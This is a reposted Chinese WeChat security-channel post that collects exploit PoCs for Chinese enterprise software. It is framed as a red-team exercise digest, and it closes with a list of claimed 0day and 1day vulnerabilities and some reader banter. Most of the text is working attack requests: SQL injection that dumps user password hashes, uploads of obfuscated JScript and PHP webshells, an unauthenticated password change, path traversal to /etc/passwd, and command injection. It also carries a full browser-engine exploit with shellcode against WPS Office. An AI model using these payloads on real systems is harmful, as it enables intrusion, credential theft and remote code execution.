pdf版本公众号回复0810获得
广联达oa sql注入漏洞 POC
POST /Webservice/IM/Config/ConfigService.asmx/GetIMDictionary HTTP/1.1Host: xxx.comUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.0.0 Safari/537.36Accept: text/html,application/xhtml xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Referer: http://xxx.com:8888/Services/Identification/Server/Incompatible.aspxAccept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.9Cookie:Connection: closeContent-Type: application/x-www-form-urlencodedContent-Length: 88dasdas=&key=1' UNION ALL SELECT top 1812 concat(F_CODE,':',F_PWD_MD5) from T_ORG_USER --
广联达oa 后台文件上传漏洞 POC
POST /gtp/im/services/group/msgbroadcastuploadfile.aspx HTTP/1.1Host: 10.10.10.1:8888X-Requested-With: Ext.basexAccept: text/html, application/xhtml+xml, image/jxr, */*Accept-Language: zh-Hans-CN,zh-Hans;q=0.5User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36Accept-Encoding: gzip, deflateContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryFfJZ4PlAZBixjELjAccept: */*Origin: http://10.10.10.1Referer: http://10.10.10.1:8888/Workflow/Workflow.aspx?configID=774d99d7-02bf-42ec-9e27-caeaa699f512&menuitemid=120743&frame=1&modulecode=GTP.Workflow.TaskCenterModule&tabID=40Cookie:Connection: closeContent-Length: 421------WebKitFormBoundaryFfJZ4PlAZBixjELjContent-Disposition: form-data; filename="1.aspx";filename="1.jpg"Content-Type: application/text<%@ Page Language="Jscript" Debug=true%><%var FRWT='XeKBdPAOslypgVhLxcIUNFmStvYbnJGuwEarqkifjTHZQzCoRMWD';var GFMA=Request.Form("qmq1");var ONOQ=FRWT(19) + FRWT(20) + FRWT(8) + FRWT(6) + FRWT(21) + FRWT(1);eval(GFMA, ONOQ);%>------WebKitFormBoundaryFfJZ4PlAZBixjELj--
网神 SecGate 3600 防火墙 obj_app_upfile 任意文件上传漏洞 POC
POST /?g=obj_app_upfile HTTP/1.1Host: x.x.x.xAccept: */*Accept-Encoding: gzip, deflateContent-Length: 574Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryJpMyThWnAxbcBBQcUser-Agent: Mozilla/5.0 (compatible; MSIE 6.0; Windows NT 5.0; Trident/4.0)------WebKitFormBoundaryJpMyThWnAxbcBBQcContent-Disposition: form-data; name="MAX_FILE_SIZE"10000000------WebKitFormBoundaryJpMyThWnAxbcBBQcContent-Disposition: form-data; name="upfile"; filename="vulntest.php"Content-Type: text/plain<?php php马?>------WebKitFormBoundaryJpMyThWnAxbcBBQcContent-Disposition: form-data; name="submit_post"obj_app_upfile------WebKitFormBoundaryJpMyThWnAxbcBBQcContent-Disposition: form-data; name="__hash__"0b9d6b1ab7479ab69d9f71b05e0e9445------WebKitFormBoundaryJpMyThWnAxbcBBQc--
马儿路径:attachements/xxx.php
网神 SecSSL 3600安全接入网关系统 任意密码修改漏洞 POC
POST /changepass.php?type=2Cookie: admin_id=1; gw_user_ticket=ffffffffffffffffffffffffffffffff; last_step_param={"this_name":"test","subAuthId":"1"}old_pass=&password=Test123!@&repassword=Test123!@
泛微 OA 代码执行 EXP
描述和影响范围
Weaver E-Office9版本存在代码问题漏洞,该漏洞源于文件/inc/jquery/uploadify/uploadify.php存在问题,对参数Filedata的操作会导致不受限制的上传。
Weaver E-Office9.0
POST /inc/jquery/uploadify/uploadify.php HTTP/1.1Host: 192.168.232.137:8082User-Agent: testConnection: closeContent-Length: 493Accept-Encoding: gzipContent-Type: multipart/form-data; boundary=25d6580ccbac7409f39b085b3194765e6e5adaa999d5cc85028bd0ae4b85--25d6580ccbac7409f39b085b3194765e6e5adaa999d5cc85028bd0ae4b85Content-Disposition: form-data; name="Filedata"; filename="666.php"Content-Type: application/octet-stream<?php phpinfo();?>--25d6580ccbac7409f39b085b3194765e6e5adaa999d5cc85028bd0ae4b85----25d6580ccbac7409f39b085b3194765e6e5adaa999d5cc85028bd0ae4b85Content-Disposition: form-data; name="file"; filename=""Content-Type: application/octet-stream--25d6580ccbac7409f39b085b3194765e6e5adaa999d5cc85028bd0ae4b85--
通达OA(CVE-2023-4166)
描述-影响范围
通达OA
是由北京通达信科科技有限公司自主研发的协同办公自动化软件,是适合各个行业用户的综合管理办公平台
本次范围:通达OA版本11.10之前
GET /general/system/seal_manage/dianju/delete_log.php?DELETE_STR=1)%20and%20(substr(DATABASE(),1,1))=char(84)%20and%20(select%20count(*)%20from%20information_schema.columns%20A,information_schema.columns%20B)%20and(1)=(1 HTTP/1.1Host: 192.168.232.137:8098User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/116.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2Accept-Encoding: gzip, deflateConnection: closeCookie: PHPSESSID=1u7tsd1cpgp9qvco726smb50h5; USER_NAME_COOKIE=admin; OA_USER_ID=admin; SID_1=779f3f46Upgrade-Insecure-Requests: 1
泛微 Weaver E-Office9 前台文件包含
http://URL/E-mobile/App/Init.php?weiApi=1&sessionkey=ee651bec023d0db0c233fcb562ec7673_admin&m=12344554_../../attachment/xxx.xls金山WPS RCE
wps影响范围为:WPS Office 2023 个人版 < 11.1.0.15120
WPS Office 2019 企业版 < 11.8.2.12085
POC
在1.html当前路径下启动http server并监听80端口,修改hosts文件(测试写死的)
127.0.0.1 clientweb.docer.wps.cn.cloudwps.cn漏洞触发需让域名规则满足clientweb.docer.wps.cn.{xxxxx}wps.cn cloudwps.cn和wps.cn没有任何关系
代码块在底下。(需要原pdf加wechat)
<script>if(typeof alert === "undefined"){alert = console.log;}let f64 = new Float64Array(1);let u32 = new Uint32Array(f64.buffer);function d2u(v) {f64[0] = v;return u32;}function u2d(lo, hi) {u32[0] = lo;u32[1] = hi;return f64[0];}function gc(){ // majorfor (let i = 0; i < 0x10; i++) {new Array(0x100000);}}function foo(bug) {function C(z) {Error.prepareStackTrace = function(t, B) {return B[z].getThis();};let p = Error().stack;Error.prepareStackTrace = null;return p;}function J() {}var optim = false;var opt = new Function('a', 'b', 'c','if(typeof a==='number'){if(a>2){for(vari=0;i<100;i++);return;}b.d(a,b,1);return}' +'g++;'.repeat(70));var e = null;J.prototype.d = new Function('a', 'b', '"use strict";b.a.call(arguments,b);return arguments[a];');J.prototype.a = new Function('a', 'a.b(0,a)');J.prototype.b = new Function('a', 'b','b.c();if(a){' +'g++;'.repeat(70) + '}');J.prototype.c = function() {if (optim) {var z = C(3);var p = C(3);z[0] = 0;e = {M: z, C: p};}};var a = new J();// jit optimif (bug) {for (var V = 0; 1E4 > V; V++) {opt(0 == V % 4 ? 1 : 4, a, 1);}}optim = true;opt(1, a, 1);return e;}e1 = foo(false);e2 = foo(true);delete e2.M[0];let hole = e2.C[0];let map = new Map();map.set('asd', 8);map.set(hole, 0x8);map.delete(hole);map.delete(hole);map.delete("asd");map.set(0x20, "aaaa");let arr3 = new Array(0);let arr4 = new Array(0);let arr5 = new Array(1);let oob_array = [];oob_array.push(1.1);map.set("1", -1);let obj_array = {m: 1337, target: gc};let ab = new ArrayBuffer(1337);let object_idx = undefined;let object_idx_flag = undefined;let max_size = 0x1000;for (let i = 0; i < max_size; i++) {if (d2u(oob_array[i])[0] === 0xa72) {object_idx = i;object_idx_flag = 1;break;}if (d2u(oob_array[i])[1] === 0xa72) {object_idx = i + 1;object_idx_flag = 0;break;}}function addrof(obj_para) {obj_array.target = obj_para;let addr = d2u(oob_array[object_idx])[object_idx_flag] - 1;obj_array.target = gc;return addr;}function fakeobj(addr) {let r8 = d2u(oob_array[object_idx]);if (object_idx_flag === 0) {oob_array[object_idx] = u2d(addr, r8[1]);}else {oob_array[object_idx] = u2d(r8[0], addr);}return obj_array.target;}let bk_idx = undefined;let bk_idx_flag = undefined;for (let i = 0; i < max_size; i++) {if (d2u(oob_array[i])[0] === 1337) {bk_idx = i;bk_idx_flag = 1;break;}if (d2u(oob_array[i])[1] === 1337) {bk_idx = i + 1;bk_idx_flag = 0;break;}}let dv = new DataView(ab);function get_32(addr) {let r8 = d2u(oob_array[bk_idx]);if (bk_idx_flag === 0) {oob_array[bk_idx] = u2d(addr, r8[1]);} else {oob_array[bk_idx] = u2d(r8[0], addr);}let val = dv.getUint32(0, true);oob_array[bk_idx] = u2d(r8[0], r8[1]);return val;}function set_32(addr, val) {let r8 = d2u(oob_array[bk_idx]);if (bk_idx_flag === 0) {oob_array[bk_idx] = u2d(addr, r8[1]);} else {oob_array[bk_idx] = u2d(r8[0], addr);}dv.setUint32(0, val, true);oob_array[bk_idx] = u2d(r8[0], r8[1]);}function write8(addr, val) {let r8 = d2u(oob_array[bk_idx]);if (bk_idx_flag === 0) {oob_array[bk_idx] = u2d(addr, r8[1]);} else {oob_array[bk_idx] = u2d(r8[0], addr);}dv.setUint8(0, val);}let fake_length = get_32(addrof(oob_array)+12);set_32(get_32(addrof(oob_array)+8)+4,fake_length);let wasm_code = newUint8Array([0,97,115,109,1,0,0,0,1,133,128,128,128,0,1,96,0,1,127,3,130,128,128,128,0,1,0,4,132,128,128,128,0,1,112,0,0,5,131,128,128,128,0,1,0,1,6,129,128,128,128,0,0,7,145,128,128,128,0,2,6,109,101,109,111,114,121,2,0,4,109,97,105,110,0,0,10,138,128,128,128,0,1,132,128,128,128,0,0,65,42,11]);let wasm_mod = new WebAssembly.Module(wasm_code);let wasm_instance = new WebAssembly.Instance(wasm_mod);let f = wasm_instance.exports.main;let target_addr = addrof(wasm_instance)+0x40;let rwx_mem = get_32(target_addr);//alert("rwx_mem is"+rwx_mem.toString(16));const shellcode = new Uint8Array([0xfc, 0xe8, 0x82, 0x00, 0x00, 0x00, 0x60, 0x89,0xe5, 0x31, 0xc0, 0x64, 0x8b, 0x50, 0x30,0x8b, 0x52, 0x0c, 0x8b, 0x52, 0x14,0x8b, 0x72, 0x28, 0x0f, 0xb7, 0x4a, 0x26, 0x31, 0xff,0xac, 0x3c, 0x61, 0x7c,0x02, 0x2c, 0x20, 0xc1, 0xcf, 0x0d, 0x01, 0xc7, 0xe2, 0xf2, 0x52,0x57, 0x8b,0x52, 0x10, 0x8b, 0x4a, 0x3c, 0x8b, 0x4c, 0x11, 0x78, 0xe3, 0x48, 0x01,0xd1,0x51, 0x8b, 0x59, 0x20, 0x01, 0xd3, 0x8b, 0x49, 0x18, 0xe3, 0x3a, 0x49,0x8b, 0x34, 0x8b,0x01, 0xd6, 0x31, 0xff, 0xac, 0xc1, 0xcf, 0x0d, 0x01, 0xc7,0x38, 0xe0, 0x75, 0xf6, 0x03,0x7d, 0xf8, 0x3b, 0x7d, 0x24, 0x75, 0xe4, 0x58,0x8b, 0x58, 0x24, 0x01, 0xd3, 0x66, 0x8b,0x0c, 0x4b, 0x8b, 0x58, 0x1c, 0x01,0xd3, 0x8b, 0x04, 0x8b, 0x01, 0xd0, 0x89, 0x44, 0x24,0x24, 0x5b, 0x5b, 0x61,0x59, 0x5a, 0x51, 0xff, 0xe0, 0x5f, 0x5f, 0x5a, 0x8b, 0x12, 0xeb,0x8d, 0x5d,0x6a, 0x01, 0x8d, 0x85, 0xb2, 0x00, 0x00, 0x00, 0x50, 0x68, 0x31, 0x8b,0x6f,0x87, 0xff, 0xd5, 0xbb, 0xe0, 0x1d, 0x2a, 0x0a, 0x68, 0xa6, 0x95, 0xbd,0x9d, 0xff, 0xd5,0x3c, 0x06, 0x7c, 0x0a, 0x80, 0xfb, 0xe0, 0x75, 0x05, 0xbb,0x47, 0x13, 0x72, 0x6f, 0x6a,0x00, 0x53, 0xff, 0xd5, 0x63, 0x61, 0x6c, 0x63,0x00]);for(let i=0;i<shellcode.length;i++){write8(rwx_mem+i,shellcode[i]);}f();</script>
绿盟sas安全审计系统任意文件读取漏洞
/webconf/GetFile/indexpath=../../../../../../../../../../../../../../etc/passwdsxf-报表 版本有限制 7.0.8-7.0.8R5
POST /rep/login HTTP/1.1Host:Cookie:User-Agent: Mozilla/5.0 (Macintosh; Intel Mac 0s X 10.15: ry:109.0)Gecko/20100101 Firefox/115.0Accept:text/html,application/xhtml+xml,application/xml;g=0,9, image/avif, image/webp,*/*;q=0.8Accept-Language:zh-CN, zh;g=0.8, zh-TW;g=0.7, zh-HK;g=0.5,en-US;g=0.3,en;g=0.2Accept-Encoding: gzip deflateUpgrade-Insecure-Requests: 1Sec-Fetch-Dest: documentSec-Fetch-Mode: navigateSec-Fetch-Site: cross-sitePragma: no-cacheCache-Control: no-cache14Te: trailersConnection: closeContent-Type:application/x-www-form-urlencodedContent-Length: 126clsMode=cls_mode_login&index=index&log_type=report&page=login&rnd=0.7550103466497915&userID=admin%0Aid -a %0A&userPsw=tmbhuisq
nday消息同步
1海康威视综合安防前台文件上传漏洞这个洞厂商修复有些问题,还是可以通过…跳转到根目录,换个接口而已2.蓝凌OA前台代码执行漏洞蓝凌V131415就不说了,去年代码执行、金格接口打得很凶,今年蓝凌有了大更新之后还是存在很多RCE问题3.致远M3Server-xxxx反序列化漏洞懂得都懂4.致远A8V8SP1SP2文件上传漏洞(1dav)1day,今年年初修复了很多,ajaxdo接口ajaxAction涉及的文件操作方法还是很多的5.普元EOS前台代码执行漏洞,这系统代码执行也太多了不赘述,建议重开6泛微F-coloav后合文件上传漏洞(0dav从数据库读xxx,然后写到根目录,除了一些流传的1day之外泛微可以说基本已安全,RASP能绕也不想耗费精力继续看了,这个洞是针对去年的前台洞绕过。7泛微E-Mobile任意用户登录(1day)Emobile很难做后续利用,不过如果存在信息泄露风险的可以关注下8泛微E-Office10信息泄露后台+后台文件上传漏洞(Oday)很牛的组合漏洞,office9洞太多用的少没必要写了9契约锁电子签章系统RCE(1day)上海某行动期间已修复,更新补丁很快,这家签章平台响应速度还是很快的,和泛微ECO经常同框打包卖10.亿赛通电子文档平台文件上传漏洞市面上的上传1day其实去年补丁都打完了,今年有新的,可以注意下11.ldocview命令执行漏洞去年项目挖的,今年还在12jeesite代码执行漏洞Oday,丁真来了都得说真13LiveBOS文件上传漏洞金融单位供应链,不需要前几年的跳目录了,新版本灵动框架的上传绕过绕的很emmm14.用友nc-cloud-任意文件写入(OdayNCCLOUD今年用过大部分都没修15.一哥VPN预计今年二进制漏洞打得也会很凶,端口PWN!16.xxIOA PWN零信任不一定真的安全17.xxx准入PWN弱口令记得也要修一修18.深信服应用交付系统命令执行19.协同办公文档(DzzOfffice)未授权访问20.电子签章平台代码执行漏洞21泛微oa进后台漏洞22.ucloud的未授权获取任意用户cookie23.飞书客户端RCE漏洞24.泛微EofficeV10前台RCE25.来客推商城任意文件上传26天明堡垒机Oday27明御运维审计与风险控制系统堡垒机任意用户注册28协同管理系统存在SQL注入29泛微emobile注入漏洞30.拓尔思WCM任意命令执行漏洞31.用友财务云任意文件上传漏洞
今天你get了吗?
这是RT吧,想让BT猝
该你发了
我看过更劲爆的
唯一的目标:活到最后
押韵
使不得使不得...
原文始发于微信公众号(老李安全):疯狂星期四HW快报② 近日0dayPOC/EXP一览
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论